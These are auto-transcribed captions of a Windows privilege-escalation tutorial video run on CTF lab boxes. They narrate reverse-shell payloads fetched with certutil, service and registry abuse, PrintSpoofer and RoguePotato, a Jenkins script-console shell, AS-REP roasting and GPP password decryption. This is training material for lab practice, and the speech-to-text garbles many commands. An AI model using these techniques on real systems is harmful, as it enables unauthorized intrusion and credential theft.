Windows Privilege Escalation Compiled Crash Course

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
hey thanks for stopping by my channel in this video I have compiled some of my privilege escalation for Windows I have had a few requests of people trying to search around on my channel and grab different parts of Windows privilege escalation and some active directory enumeration so I've gone ahead and compiled that here for you this is not the same as what I have in my complete ethical hacking course this is separate this is stuff that I have kind of just sprinkled all around on my channel and I've gone ahead and compiled it here in this one video for you so if you're interested in active directory enumeration that's going to be at the end of the video and then the first two thirds of this video is going to be focused mainly on Windows privilege escalation so let's go ahead and jump into it so before we get started too far and we start looking at the output of Lin Peas I wanted to show you a couple of different resources that you can use one is this one right here shushan 747 this is a this is a privileged escalation enumeration cheat sheet and then also payloads all the things has one and theirs is really long and pretty in-depth so you can choose which one you like I'd recommend as a beginner to start with shushing it and these links will both be in the description down below very simply what you can do is copy these little one-liners and paste them in over here and it will give you an output and so we're going to see some of these in the future when we run Lin piece this is basically what it is running in the background and it is going to give us the output in color so that way we don't have to look through all of this so you can copy this and query the registry for passwords which we will see in the future as well so these one-liners are basically what winpies is going to be running for us and we're going to be looking through the output I just wanted you to know that there is ways out there to do this manually without windpies because every now and then you will come across a box where you're not able to get winpies to load or to run and you can still do the enumeration manually with one of these cheat sheets so with that let's go ahead and get set up here we are on the try hack me web page and we are going to be doing some windows privilege escalation we're going to be working on this specific set right here there are three different sets of Windows privilege escalation and I think we're going to work through each one of them but this one is the one we're going to do first and there is quite a few different Windows exclamation paths we're not going to do all of these but we're going to do the ones that I think you probably need to know the most and the ones that we skip over you can go ahead and work through on your own and maybe we'll come back to them but the first thing you need to do is connect your VPN and then RDP in to the windows box that we have and get a reverse shell so I'll walk you through how to do that we're going to just copy that paste it in here and it will go ahead and launch for us that Windows box and then the next thing we're going to need to do is make a reverse shell so we'll go msf Venom and we need this to be exe EXE change our port 10 2.1.182 and we are not using Java we're going to be using windows I think it's x64 shell reverse TCP like this and we can go ahead and make this this was not the right directory that I wanted to make this in but that's okay guess we'll just transfer it over from right here and it tells us our final size right there not sure why I'm getting all those outputs but if we LS we now have the reverse shell right here I'm going to remove that file.txt so now we need to move over our reverse shell so we can go sudo python Dash 2 in our password and now we're listening on this host and we can come over to our client our Windows client and go CMD to open up a command line and now that we have this open we'll CD to the desktop so we'll say assert util Dash URL cache Dash F Dash split HTTP slash 10 two one 182 and then we called it reverse Dot EXE and we'll see if this pulls it over we should see it pop up over here and there it is and now we can close out of this and we can go netcat lbnp and I think we made it on Port 444 and now if we execute our reverse dot exe we should get a shell over here and I spelled it wrong so we got our reverse exe and we have our shell over here so now that we have this over here you could do everything from over here if you wanted but I find that this is a little more laggy than if I just type over here and run my commands and so one of the things that we're told to do in the instructions is well we already got a reverse shell is to run a file that's already on this box to look for our privilege escalation pass and so we have this exe right here I'm not going to run this we're going to run a winpies because that's more realistic and that's what we're going to be doing in the real world I've actually never ran this file so I don't even know what is inside of it but we're going to run winpies so you can actually go to Google this first one right here and you can go down to the release page and you would grab winpies annie.exe right here and you can download it I've already downloaded it and I've changed the name to win.exe and it's inside my tools which is apparently which is currently running this RDP so we're not going to be looking at it so we'll just go ahead and transfer it over so what I will do is CD to my desktop and tools and if we LS we have it right here and so now we'll set up our python listener again and now that this is hosting up the file we'll grab this win.exe and run it so we'll do the same thing we did before search YouTube Dash URL cache Dash split Dash f HTTP slash ten two one one eight two slash Win dot EXE and that should grab the file and we can go dur and it tells us that we have it right here now we're going to go ahead and run this by running the same way we ran the reverse shellwind.exe and I'm going to let this run and then we'll walk through it once it has finished okay so I believe that windpies has gone ahead and ran so we'll go ahead and start looking through these and we're going to look through these in the order that we find them on winpies not necessarily the order that they are showing to us right here so we're going to do these out of order at least the first couple so that way you can see what it's like to actually scroll through winpies and read the output and look at what's available first rather than me just jumping and showing you because you need to get used to reading the output and understanding what is here so we'll go ahead and start scrolling through here and we can look at Watson a lot of these exploits from Watson are going to be at kernel exploits and we can come back and try these later but we're going to skip over these because some of them won't work and some of them take a really long time time to actually try and pull off and then we're just going to get some basic information about the Windows system we see lapse is not installed and we have this a cached credentials right here so if you open this up and look at this we're not actually going to cover this right now because we're going to see that you need me cats right here we're going to extract the passwords with mimikats and for Mimi cats you really should be a system in order to run this but if you look at this you're querying the registry and the and you can actually look to see how it's making this query because what we're going to see here in a second is going to look really similar to this only we're going to be using the Microsoft installer to run our exploit so you have this right here you can read through it and learn about it but we're not going to be using that right now so you have a cached logon account and it tells us that there's no AV detected this would be really bad if it was in the wild and we can see right here any local account can be used for lateral movement which would be really good for us if we were on a network and then we keep on scrolling down and we see we have this always install elevated right here now if we come over here we can see this is one of the things in the registry we are looking for and so in order to grab this you wouldn't have this laid out just like this in the real world so we're not actually going to use this but we have this registry always elevated right here and we can come back over here and open up hat tricks right here opening a new link and we're going to have something that looks really similar so if we wanted to we could make this same query like we were shown over here inside of a try hack me so you could just highlight all of this and we could make this query over here I don't really want to scroll all the way down so I guess we could come over here and do this and you can see our output which we have this ox1 which it actually tells us about over here note that both of these are set to ox1 so we have this exploit we can run that's why when PS found this for us so we'll come back over here and it's going to tell us what we need to do we need to make a meterpreter payload right here so we have this Ms at Venom payload that they tell us we can use right here I actually don't like this with the way they give us this payload so what we can do is use this payload right here and we'll come back over to our tools and I guess we'll make the payload right here so we can leave all of this we can leave the port and we can change this to 10 2.1.182 which is going to be whatever your IP address is and then we can create this this looks exactly like what we made when we made our reverse shell only difference is instead of an exe we're going to be using this Microsoft installer extension right here and our port's different so we can go ahead and Host this file up and we can grab it over here on our Windows machine we still have our reverse shell and we do so we're going to run the assert util Dash URL cache and if you haven't noticed yet you should go ahead and try and memorize this split HTTP 10 2 1 182 slash and I don't remember what we called this we called it reverse dot MSI just copy it so that way I don't have a typo and that should go out and hit our server and grab that and now we can run it and we're told how to run it right here but just for the sake of like actually walking through this and pretending like we don't have the answer sheet we can come back over to hack tricks and if we scroll down a little way they actually tell us how to run this and then we need to run this with our path so we can copy I think we're actually in the users right here so we can paste and then we are the user user and this is inside of desktop and we should be able to run this but we will need a another netcat listener and it is on Port 53 is where we made this payload to listen at right here on Port 53. and if we run this hopefully we get our shell back and we didn't so let me see what I did wrong I did not put in our actual file to execute so we can paste this slash and then we need to put in our reverse.msi right here and that went awfully fast but it worked for us and so now we should be a system if we say who am I it tells us we are system so that is how we would Elevate if we see that always elevated from our winpies output back here just like this so that's pretty simple all you would need to do is open hat tricks and basically just follow along with what they say so that is the first one that we come across in winpies and now we will continue looking and see what we can find okay so let's go ahead and keep scrolling through here we're going to see ntml settings nothing helpful and we'll keep scrolling through here we have user information and this is our RDP session keep on scrolling through here and we have this file permissions right here we also have see this d-a-cls we'll do this one first and then we'll come back and do this modifying changes so we have this a file permission this a file perm service exe right here and it tells us that we have file permission everyone all access so if we do the same thing we did before and open this up it will tell us what we can do with it and so we can run this right here we can put the service name and then we can tell it that we want it to run it so we need to move our reverse shell into the path because everyone has the ability to write to this so what we can do is come back to our bottom here and we can type in our copy and then our current path to our reverse shell which is on our desktop so we can copy this paste and I think we called it reverse dot exe and we'll just set up a netcat listener over here on Port 4444 because I I think that's what we made our original payload on so I think this is the port we made our original payload on we will find out so we want to copy that and now we want to put it in the actual file path and I guess we can scroll back up and try and find it right here and so you can just copy this completely as it is with the quotations go all the way back down paste this in and then we tell it yes we want to go ahead and run this like this and it says that it copied it and now we should be able to start this service and it should give us a shell back as long as we are listening on the right Port so now we can tell it next start file perm and then what was that service m SVC tells us that we have this wrong I forgot an e right there so net star file perm SVC and it should be running for us and going through that path and we get a shell back and if we do who am I we are systems so now we are root on this box again so that is how we would abuse this file path that is writable to everyone we would write to it and then we would execute the file you can think of this kind of similarly to Linux with the bin bash we're putting something inside of the path and then the file gets executed when it tries to actually execute this right here and it gives us root because it is being run as root or as system in this case so with that we'll go ahead and check this one out next we're going to go ahead and do this unquoted service path and then we'll do this dacl service right here and they're going to be done in a pretty similar fashion so the unquoted service path is one you're going to hear a lot about when you are thinking about Windows privilege escalation you'll see it every now and then but it's really not that common at least in the world of ctfs so we'll go ahead and do this unquoted service and I like how they named it unquoted service path and so you have this unquoted service path and if we stick something right here with the name common it is going to hit anything with the name common and it's automatically going to execute it so we're going to make a file and we're going to name it common.exe and we're going to even use the capital c so that when we restart this unquoted service right here it's going to automatically run all the files inside of this path and because it's unquoted we're able to inject into it our own file so what we're going to do is we're just going to move our reverse shell because we already have it on the desktop I think over here so if we type in dur we have our reverse.exe right here on the desktop and we're just going to to move it over in to this file path right here so you can actually we'll come back and copy this in a second so what we will do is we will type in copy and we're wanting to copy this reverse.exe from our current directory so we'll just type in copy and then we can say copy reverse dot exe just like that and then we're going to want to make a quote for the file path that we're moving this into so we can copy this so that way we don't have any typos just like that and in here we're going to want to rename this reverse.exe to common.exe remembering that we want it to have the same start right here to this common so that way it automatically executes our file for us and then we can close this quote off and that looks right so that should go ahead and it tells us that it copied the file over and it should have saved it as the common.exe and now at this point we will want to net stop and I'm going to just copy this right here to avoid all typos and we can run that and it's going to tell us that it is not started which is probably what it's going to tell you as well and then we can go net start and then paste that in there and run it and I did not start up a netcat listener for that reverse shelf so it did not work so I'll just copy this paste rerun it and hopefully we get a shell over here and we do and who am I and we are Authority system so what we did just remind you again is we have this file path right here and it tells us it has no quotes and there are spaces if you have spaces like in a Cali machine a lot of times it just isn't going to work unless you have it quoted but in Windows you can name files and directories without a quote and if we can inject something in here and then we run the service that is automatically going to go through the file path it's going to hit our reverse shell that we were able to put in here and it's going to execute it as long as it has the start to one of the file names or some other kind of executable file so we put it in here and it goes through this path and it executes everything in the path as the authority system as root and it gives us back a shell over here so we can close out of that and we can come back over here and we can look at this one right here okay so we are right here and if you remember we already opened this up and it is right here and so we're still looking in the permissions area and what we're going to do is something very similar to this right here only difference is instead of putting this in a start we're going to put this in the bin path so this SC right here if I remember remember right it just is a system service that is ran on Windows sometimes you'll see it as the sc.exe when we want to do some kind of command on Windows systems you can actually Google it and I'm sure it's you're going to get a lot better explanation of what this SC does but sometimes you'll see this as sc.exe and what we need to do in order to modify this service is very similar to what we see right here so I'm just going to go ahead and copy this so I have it to my clipboard and we're back over here on the user desktop so what we will do is type in this SC config we're going to paste in what we just copied and then we're going to tell we want this in our bin path and then we're going to put our actual reverse shell in the bin path which is inside of this directory right here so we'll copy this paste this in and then we want it to run our reverse dot exe so we should be able to come back over here start our netcat listener close off our quote and see to make sure that it says that it was successful in Saving it and we can run the same as we did earlier which is our net start and then we want to start our service path which is right here so we can paste that in and hopefully that runs and we get a shell back over here so I think you should be starting to notice a similarity so the reason all three of these exploits so this one right here the file permission service and the unquoted path these are all labeled under the Hat Tricks right here as interesting services and we have this non-microsoft and they're all in this one URL because they're very similar what we're doing is putting a file inside of one of these paths or directories that the Windows machine is going to execute as the root user or the NT Authority system and all we have to do is listen over here and restart the service because we're able to restart the service it will go through and run this as NT Authority system and it will give us back a shell so these are all very similar in the way they run and you can go and read more about them I think they're pretty simple to understand and pretty easy to run you're not going to see these very often in ctfs because they're too simple a lot of times when you're doing some kind of Windows privilege escalation even on a certification exam you're going to find some random file or some vulnerable service that winpies is not going to pick up so with that we'll go ahead and look at the next vulnerability so I think we'll do a few more of these really easy privilege escalations and then we'll move on and we'll skip ahead to some of the more in-depth ones so we will at this point we can just move on and look at the weak file permissions which is just the one after our unquoted service path that we just did and you can see this red service there's actually quite a few privileged escalations you can do with this service right here but this one is not very far down in winpies so if we just scroll down a little bit we get this right here looking through service registry and we get this Interactive full control so this is it going to be pretty bad so we can come over to look at what we have here and we can actually just hit our Command find and we're going to end up doing is adding in our reverse shell and we're going to do the same thing we did before with the net start and we're going to run the reg service and it's going to give us a reverse shell so what we'll do is just copy this right here I'm going to open up a file so we'll close out of this we'll open up a file and modify it right here so we have this reg add and we're going to add in to the service name that we're going to be modifying and that is the reg service and the path to the new binary which is going to be our reverse shell which we have typed out several times at this point and we're going to just copy this come over here I can't remember if I copied the C I did delete this and it now has the path so we should be able to copy this and run it over here and it tells us the operation was complete and now we can do a knit start reg service the SVC and we need to be listening on a shell so we'll close out of that we'll be listening on a netcat listener to get a shell rather we'll run it and we are system if I can type right and there we are so all we ended up doing was abusing this right here since we had full control of this registry service we are looking to see what permissions we have now this registry service is something that we can query and I'll just show you in my notes I have a whole bunch of different ways to query the registry service and you can actually get these notes on GitHub that's where I found them a long time ago and you can just paste these in if you actually go over to my complete ethical hacking course I actually walk you through looking for passwords and there's a bunch of different one-liners you can paste in here and see if you can pull them down and I actually think this machine is vulnerable and has stored passwords that we are able to find which we'll look through later but the registry service is something you're going to want to look at to see if you can abuse so if we run this one liner right here I've actually seen this a few times on ctfs where you just sit here and you look through like these users and you can read over here and find passwords and I'm sure that this box because it's vulnerable every direction if you look through here eventually you will come across a password and I'm actually pretty sure that this is one of the future vulnerabilities that we're supposed to look for okay so I have gone ahead and opened up the box Jeeves on hack the box and ran an in-map scan so that way we have the open ports here and I'm just going to go ahead and tell you that we're going to look at Port 80 and poured 50 000 so what we can do is just type in the IP address and then go to it and we are brought to this Ask Jeeves page right here and if you search nothing really works out for us so we'll go ahead and check out 50 000 and we see we have this problem is 404 so automatically what we should do is run F and we can come back here and run 10 10.63 and we're actually going to need to run a different word list because this specific word list that we have going right here doesn't have the directory in it that we want we want to run der Buster and then we want to run a directory list and 2.3 and we want the medium text just like this so we press enter and this will start running for us and hopefully it will pull back for us what we need and actually I did that wrong we need to be fuzzing for 50 000 so we can come back to our IP and we're going to tell it we want Port 50 000. that looks right so we'll run that and then we see we have this Ask Jeeves right here and this is not the only CTF that has this Ask Jeeves right here so you're going to want to remember how to do this exploit with this Jenkins service it won't be Ask Jeeves it'll be a Jenkins service because I just saw this a few weeks ago on a different platform and for some reason the Box seems to be going kind of slow hopefully it doesn't affect anything but we can come in and look at this manage Jenkins there's two different ways to get a shell on this box we're going to do just the simple way we can go to the script console and then anything we put in here will execute on the server and give us a shell back the other way is to actually come and create a project and do a build history and you can execute code by actually compiling it and clicking build but we're not going to do that in this specific example so now what we can do is we can just come to Google just type in Jenkins reverse shell and check out a GitHub page and I think I have a typo in there I do but we want this one right here this Java reverse shell and this right here will work for us so we can go raw command a command copy come back to this little console to the beginning we're going to change to our IP address and mine is 10 10 14 5 and we can use port 80 for four that's fine so we come over here and say netcad lvmp 80444 run now that we're listening we can run this and hopefully we get a shell back over here when it executes and we do so now what we want to do is send this over to a meterpreter session so we can open up a new tab and type in MFS console just like this and let this run and then we are going to set up what we need to move the shell over from over here our netcat listener to the Metasploit console so what we'll want to do now is Type in use exploit multi-script web delivery just like this we can type in options to see what our options are we're going to show targets and we're going to use two this two right here is a Powershell uh we'll set Target to two since U's doesn't work for us so now that should be set we can set the payload to Windows interpreter reverse TCP just like this and then we're going to set our L host to ton 0 we will set the SRV host to Aton 0 as well and then we can look at our options again and make sure everything looks right and it does so we can type in run and it's going to give us this little Powershell script right here and it's going to be base64 encoded the reason this is a base64 encoded is because sometimes Windows likes to use Powershell with base64 encoding you're actually going to come across this quite a lot and we'll run this and see if we can get a shell back over here and it did not work for us let's try this again and it says now that it's working so we have our shell so now we can type in sessions and we can say use session I think we type in sessions Dash I want to get an interactive shell and then we say who am I and it says unknown what happens if we just type shell who am I and now we have our shell working over here for us and so we can say background put that in the background for us okay do we want to exit yes we can background from here and now that is set in the background and what we'll want to do is run the multi exploit suggestor for Windows so we'll type in use post multi-recon local exploit suggestor options and then we want to tell it to set session to one and then run and this will run for us and it's going to tell us that we can use juicy potato okay so that took a little while to run and it got interrupted I'm gonna go ahead and just use juicy potato for us so what we're going to do is type in use exploit and then we want Ms 16 underscore zero seven five and let's see if it's in here let's just search j u i c if anything comes down and we have right here this one is what we want to use so we will use one options and we want to set a session to one and then run this and see if we can get a shell back add an issue the first couple of times because I did not change my Local Host to ton 0 and now I have fixed that and it says the session is open but no session was created so now what we want to do is go to that session so we can type in session two and we can run this and then we can check to see if we have any tokens so we can tell it to load Incognito and then I spelled that wrong so load in cognito and then we want to tell it to list tokens Dash U I think that is how we list those and it tells us we can use NT Authority system so we'll go ahead and copy this right here so we have it spelled right and then we're going to say impersonate token and then we want to paste that in what we just copied and it tells us that it is not spelled correctly let's try copying this instead so we'll delete this paste and it says that it works if we say who am I we can go shell who am I and we are Authority systems okay so at this point we're going to transition over to try hack me so if you'd like to follow along you can go ahead and connect your VPN and open up the windows prevask box and we're going to go ahead and start working through this also a another reminder if you are new to this course and you haven't watched the previous one it will be helpful for you especially if you're new to the world of penetration testing and windows privilege escalation to watch part one of this series it will make a lot more sense before you start this second portion so let's go ahead now and jump into it okay so I have gone ahead and launched the box that we are going to be working through this is the same as the previous section of Windows privilege escalation that we were working through and you can double click this and put it into your terminal launch it and you will have access to the RDP session now what we will do first is the printer spoofer because it is the easiest and then we'll go ahead and do rogue potato and I'll try to walk you through what exactly is going on and how it works the first thing we're to do is get a shell so we can copy this come over to our RDP session open up a command prompt and we're going to need to run this as administrator and the reason we have to run this as administrator is because we're going to be using PS exec and PS exec is a Windows system that is going to give us a shell back and we're going to tell it we want a shell back as a local user and the password is password one two three and now if we say who am I it's gonna tell us we are the admin so if we run a who am I slash priv like this we're looking for this Essie impersonate privilege right here and it says that it is enabled and it's going to be enabled as admin but it will also be enabled as a local user if you come through at some kind of Windows system which is why we're coming through PS exec a lot of times in the wild when you come across this SE impersonate privilege and it's enabled it's because you've uploaded some kind of file and it's been executed on the server and it comes through a Windows process so in order for us to have this as a low-level user we're going to have to use that payload that we had copied so we'll come back over here because apparently it is not on my clipboard paste it in and we need to pull our shell over so I always call mine rev.exe and before we're able to do that we're gonna have to create our payload which I think I already create created it's the same thing we did last time we'll just use this msf Venom you'll change your port and you'll call it rev.exe so we'll go ahead and close out of that and I'll pull that over the same way we did last time sir util Dash URL Dash URL cache Dash F Dash split HTTP 10 2 1 2 is my IP and then slash rev dot exe and that is not a DOT and then we can come over here and go sudo python simple server and we'll run this and it'll come over and grab our reverse shelf so now if we say dur we put that in the wrong spot whoopsie doopsy we'll go ahead and cancel that but we'll get our shell here and then we'll move it in a second actually we'll just go ahead and move it now CD dot dot CD dot dot CD priv ask and the reason I'm using the prevask file this time and I didn't last time is because they already have the printer spoofer in here somewhere and we're going to go ahead and just use this exe and I'll show you how to pull it over so that way we don't have to type in the same assert util a bunch of times so we'll pull over our reverse shell into the right place and then we will have to run it so we'll just copy this and say rev.exe and we'll need to make sure we are listening so now we are listening so now we can run this like this and the reason we want to run the command they have right here is because we have to run as a PS exec and now it has finally ran and we should get our shell back but we did not run Rev dot exe and now if we say who am I slash priv you will see that we have a lot less permissions but we still have the SE impersonate and if we just say who am I you're going to see that we're a local service instead of admin so what we'll do now for the printer spoofer is we can just come back CD into the priv ask and we can run the printer spoofer so we should be able to just type in let's see if we can just run the printer let's see if we can just run a printer spoofer.exe and it does not let us it says it's unrecognized and it is possible that it didn't work because I didn't run it with these capitals but we'll just go ahead and for the sake of this we'll just give it the full path and we'll say printer spoofer and it tells us we need to enter in our commands so we should be able to run the printerpoofer.exe with the dash H and it will tell us what we need to do it tells us we need to execute the command line and it tells us that we need we need it to interact with the process and we need it to run a command the command we're going to run is our reverse shell so what we can do is just paste that back in there we're going to tell it the command we want to run is our reverse shell so we're just going to say rev dot exe and then close off the quotes and we'll say Dash I and then we should be able to open up a new netcat listener over here and if we run this it's going to tell us that it is using the SC impersonate privilege and see if it can create a new shell and it does and so if we say who am I we are now Authority system so that is the printer spoofer now we're going to go ahead and check out the token impersonation with Rogue potato right here so now we have our shell go back to CD priv ask and now that we're back in here we'll have the Rogue potato sitting in here somewhere right here and I want to walk you through what is happening over here so the way Rogue potato works is a little different than juicy potato juicy potato we're able to just use a pour one two one three five for the RPC client and you'll see this open sometimes but Windows changed it for rogue potato making it so that we had to get the token through Port 9999 and so what this does is we basically just send request to our attack machine that then redirects it back to the Windows machine to Port 9999 so that's what this one line does right here and then when we run Rogue potato we just tell it our remote IP address the shell we wanted to execute and that we're going to be listening on a port 999 so it is possible that this won't work with our exe because I have had trouble in the past getting this to work with the exe and I've had to use a Powershell and we might have to go ahead and do that but we'll try it this way first and then if that doesn't work we'll use Powershell so we will need to get our shell which we've already done we're going to set up this listener right here and so rather than me typing all this out we're going to just copy it paste it and now we have this forward working for us right here it's going from 4135 to 999 on the Windows box that we are attacking and we can use this Rogue potato that is set out for us right here so we'll paste that in and then you'll have to use your actual IP that you are running with and mine is 10 2 1 182. and then we are going to execute our reverse shell not and we'll be listening on for 9999 so we'll come back over here set up our netcat listener on Port 9999 and we can finish typing this out so we want to execute R reverse shell we'll copy this so I don't have any typos slash rev dot exe close that off and then we want to listen on 9999 so we'll run this and see if we get a hit back over here sometimes it takes a few seconds but if we don't we'll run it a couple of times and if this doesn't work we will use the Powershell version because I have had trouble in the past getting this to work I needed to be listening on Port 444 over here and not Port 999 so we'll copy this again paste enter and we get our shell back who am I and we are Authority system so that was kind of a workaround um so we don't actually need to run that with Powershell I just was listening on the wrong Port because I had this in my mind and not Port 444 which is what we set up with our reverse shell so that is how you would use the Rogue potato with the port forwarding over here from our local machine to the attack machine okay so here we are I have already ran the nmap scan on the box forest and I ran this so that you could look at what a domain controller looks like when you run an nmap scan against it you're going to see usually a lot of ports open but the one that matters the most I think is the sport 88 when you see this you can automatically think domain controller because it is going to be doing curb roast authentication and I think Port 88 is only open for domain controllers if not you can let me know down in the comments but I'm pretty sure this indicates that it is a domain controller so when attacking a box it looks something like this the first thing I always do is go to SMB client and SMB map and crack map exec and so we'll go go and check this out so we can go SMB map and then I think it's a dash H4 this tool and we're 161 and we'll see if there's any shares that we can access because often in ctfs if there are any shares then we like to look at them because there's often information stored in them that help us solve the box so I think SMB client is a dash l 10 10 10 161 enter and I know some people like to do a null authentication like this not actually sure if that you supposed to be uppercase and it says we get a it failed so we are not able to access anything in the file shares the next thing I like to do is go to this RPC right here because we have access to a tool called RPC client and we can pull down users also we can use the ldap and pull down users through that as well so what we can do is come over here and we'll just use ldap search First and we can just say actually we'll use RPC client because it's easier so we'll just say RPC client just like this and I don't actually remember the commands that we're supposed to use we're going to use this in this is very important because this is an update that you will need to use this in if you don't nothing is going to work for you with RPC clients so we can say RPC client and we're going to go like this with no user we're going to tell it we don't want it to ask for a password and then I think we can just give it the IP address and it lets us in so now we can hit tab twice and it'll give us all the options that's a lot of options I don't want to see all those but what we want to do is enumerate the Dom users I think that's right and this will give us the users right here so we have these as the users we also have the administrator up here the guest the krb TGT so the ticket granting ticket service which doesn't really mean anything for us and we also see that there's this red number right here you can actually copy these and paste them into Google I'm not sure if it will tell you what they are assigned to these are like a user ID for active directory you get a rid whenever you create an object and I think they're used like a SID number I'm not actually entirely sure exactly how these are assigned but that's kind of what they do you can Google it if you want to know more about them so now we can go see another way to grab the users because RPC client and ldap sometimes bring down different users or a different set of users and it's always best to double check because these are just tools so we can go ldap search and then we want to run the host so we'll say Dash H 10 10 10 161 we want to just send this and see what happens I think we need to run a dash X and a dash s the base and the naming context like this and it's telling us this doesn't work because we're giving it the capital H this recently changed and we have to put in here ldap like this and it's going to tell us the naming context which actually didn't really help us out much let's see if our inmap scan had it we're looking for the DC name so htb right here this htb local so it tells us we don't actually need to run the naming context now that we have that so we can delete all of this if the nmap scan didn't pull this back right here this is one way to get that hdb dot local so now we can type in dash B and then DC equals hdb comma DC equals local and we get a bunch of information back so you can actually read through here this isn't going to be our final destination but there is sometimes some interesting information in here the same account name but I'm not going to bore you through reading that because that's not actually what we're after what we're going to be after is an object so what we can do is tell it we are after a very specific object and we want the object class of the user and one of the things you should know is you can actually just copy this right here and save it somewhere so that you have it and you don't have to go through all of this you might have to check the naming contents the naming context but that would be it and then you can just paste in what we're about to type in here so we're going to grab the same account name and I think I'm actually just going to copy it from up here where we saw that so I don't miss spell anything paste that in and then we're going to grab the same account name and then we can run this and see what happens requesting the account name okay so I unquoted this and it worked for me so now we have the usernames that we saw earlier and if you notice we're actually missing one that we had earlier so let's go up to the RPC client and the one that we actually needed is not in the ldap search so this is why you would run both because we're going to end up needing this service Alfresco in order to complete the box so if we were to run something like this we could copy this come over here we'll gedit users.txt to paste these in and we can cat the users.txt and then we want to awk and we want to cut at the second position so we can say print like that and we can just grab these and put them into our file so now we can G edit this and delete all of that and now we have these users but we also need that one we just saw which was the SR was it SVC Dash Alfresco like that I believe so we can save that come back over here and check this out make sure we got the right user yes SVC Alfresco so now that we have a list of users what you can do is go to crack map exec or curb root and start brute forcing for passwords but I think we'll save that for another video because that is not the direction of this box the direction that this box goes is to go to an impact an impact it tool with our user and check out the get in P users and so this actually comes installed on a Cali automatically so it's impact it get NP users like this and we'll run Dash H to see what our options are and we'll see if we can pull down a hash for one of the users that we have so we can type in get NP users and then we give it the domain controller IP so DC IP 10 10 10 161 and then we want to request from htb.local and you actually need this little slash here this trailing slash and recently I was running a tool that took me a while to figure out why I was getting a syntax error I think it was Hydra and I needed the slash at the front so you do have to be aware of these slashes sometimes so if we run this it gives us back this hash and with the updated hash cat it should just crack this automatically so we can just say G edit hash Dot txt paste this in save and I actually have not opened up rocky.txt so let's see if hashcat has an automatic word listed it we use hash cat Dash hash cat hash and then we don't have a word list so let's see what it does I guess while this runs okay since this says it doesn't have enough memory what we'll do is copy this and when it says it doesn't have enough memory allocated it is because I don't have enough memory allocated to this specific VM I actually have a different one over here that runs with a lot so we'll just come over here and paste in the hash and save it and we'll run hashcad over here so hash cat hash.txt and we want to run it with Rocky and I do have rock you opened up on this specific machine so it should run and pull down the hash for us and it does and we're told that it is service so now we can copy this come back to this machine and we can G edit our user.txt and we are going to paste this in because we saw that this hash belongs to this user right here so now if we save this and we come back to our nmap scan we can win our M into this machine and get user so we can close that and scroll down to the bottom we can cat our users.txt and we can say evil when RM and I think it wants a user of svc-alfresco so we'll go Dash I now it should run and we are user on the box so we give a who am I we're going to be at this service Alfresco right here so we are going to do a post enumeration for active directory later on but for now we're going to go check out the SMB enumeration all right we're going to be starting with the Box active from hack the box and so I went ahead and ran this nmap scan the IP address is 10 10 10 100 I ran it with a T5 because I didn't want to wait and it wasn't pinging so I went ahead and did the dash capital P in and we have the nmap scan here now this is what a normal looking active directory in map scan is going to look like sometimes you'll have a port 80 open or you'll have a web server sometimes you won't and when you don't you can just look at this and you can just think okay here's what I need to do is I'm going to start if it were me I'm going to start right here 139 445 then I would go to 398 for so this is just kind of my method that I would be working through this if this is how I'd go about it so what we are going to start off with is looking at this port 445 and we'll come over here and we can actually just type in SMB map and it will look just like this you've seen this before what we're doing is looking to see if we have any file shares that we have access to within the with Anonymous login so we can go ahead and run that and see what it pulls down and it says we have access read only to replication so you've seen this also before so we run this SMB map and then we can also run SMB client and then it's forward slash forward slash 10 10 10 10 100 and then we can run this slash replication replication and then we can do a dash C and then we can type in recurse recurse LS and so what this is going to do is it's going to go through and it's going to run through all of the files and it's going to list them out for us and this is helpful if you don't mind having your terminal full of stuff but I like doing this because the other way to go about doing this is to actually log in to the SMB server anonymously and then going through and manually looking at everything that just takes a lot of time and it's a lot of typing and it's a lot quicker to just use that command we just saw but if you wanted to go ahead and do it the manual way what you would do is just type in SMB client and then we can type all this in and we'll just delete this and then we hit enter and it should load us with a command prompt and then you would just have to go in here and you can LS I don't remember yeah Dura works too and then you would just see this little d right here means it's a directory so you would go ahead and then you would CD into active.htb and then you would go ahead and look at the files again and then you would choose whatever folder you want to go into and so on and so forth and it just really takes forever so it's a lot quicker to do it this way win this loads for us we can start all the way at the top and we can look and see okay if we cd'd into active.htb this is what you're going to see and then the way SMB client works is it just is going to go through and list for us each one of these files it's going to load it's going to CD into the next one and then it's going to list it CD into the next one and it's going to list it and so if it were my first time going through here I would remember these they could be useful and then I would keep just keep on scrolling but because I would definitely look at users if I was uh first time on this box see if I could pull down some users because if you have a user you can try and pull down hashes which we're actually going to see a little bit later with some in packet tools so if you can get a user you might be able to get lucky enough to pull down a user with a password or a password hash that we can crack and we are actually going to see this so that is helpful that it has users listed there if you were on a CTF or some kind of certification it's possible that they would just throw this user here and then they would give you just a whole list of users just to lead you down a rabbit Trail so you got to be careful of doing something like that so we have the registry policy we have groups and at this point this is something that's interesting because if you have this groups.xml and you have it inside the policies this actually is going to have for us the information we need and so in order to grab this file because we're already logged in right here on this SMB server we can go ahead and just copy this entire thing and save us some time and we can go ahead and CD to this location and I don't really want to get this um at this specific spot so what I'll just show you what we're going to do is you would go LS and you'd see this and then you can type in get and then groups.xml and I'm actually going to move over to a different folder and grab this because it's going to be grabbing right here in my Linux box and I don't really want it there but that's how you'd go ahead and get this folder so I'm going to pause the video and I'm going to switch locations and then we'll go ahead and get this file and look and see what's inside okay so we're going to grab this file we can close out of here and then we can go ahead and LS and then we can cat this out and we can see what is in here and so we see we have a password it is hashed and we're going to go ahead and crack this so what we'll do is we will highlight the entire thing now I don't expect you to know this but whenever you see something inside the group policies you can know that this hash is going to be the group policies half so you can actually type in gpp Dash D Crypt just like this and then you should be able just to paste in your hash and then hit enter and it will go ahead and decrypt that for us so it tells us this is the password for this account right here so what we'll do is we'll go ahead and once you get it some notes and we're going to grab this user paste it in and then we're going to grab the password so that we have this as well and now we have those and what we're going to do what you would normally do see I know where we're gonna go because this is really and I've done this box before but when you see this SVC TGs this is telling me this is a ticket granting service and within active directory you can have tickets for each user and this right here grants tickets for the user so if we can somehow Grant ourselves a ticket or get a ticket or get a hash then we get on this box so that's what ultimately we're going to do especially when you see this TGs this ticket granting service then you need to be thinking curb roasting or doing something with kerberost but also something that's really common that you're going to see on active directory is the is this will be a TGT and it's a ticket granting ticket and it's the ticket we need in order to get on to the network so that's a lot of ticket saying but anytime you're dealing with active directory you're going to hear it a lot those are just a couple of little acronyms that you need to be aware of so with that what you would do in a normal situation when you don't know what you're doing and you grab a user and a username is you're just going to go ahead and you're going to run SMB map again so we just go SMB map and then we're gonna go I 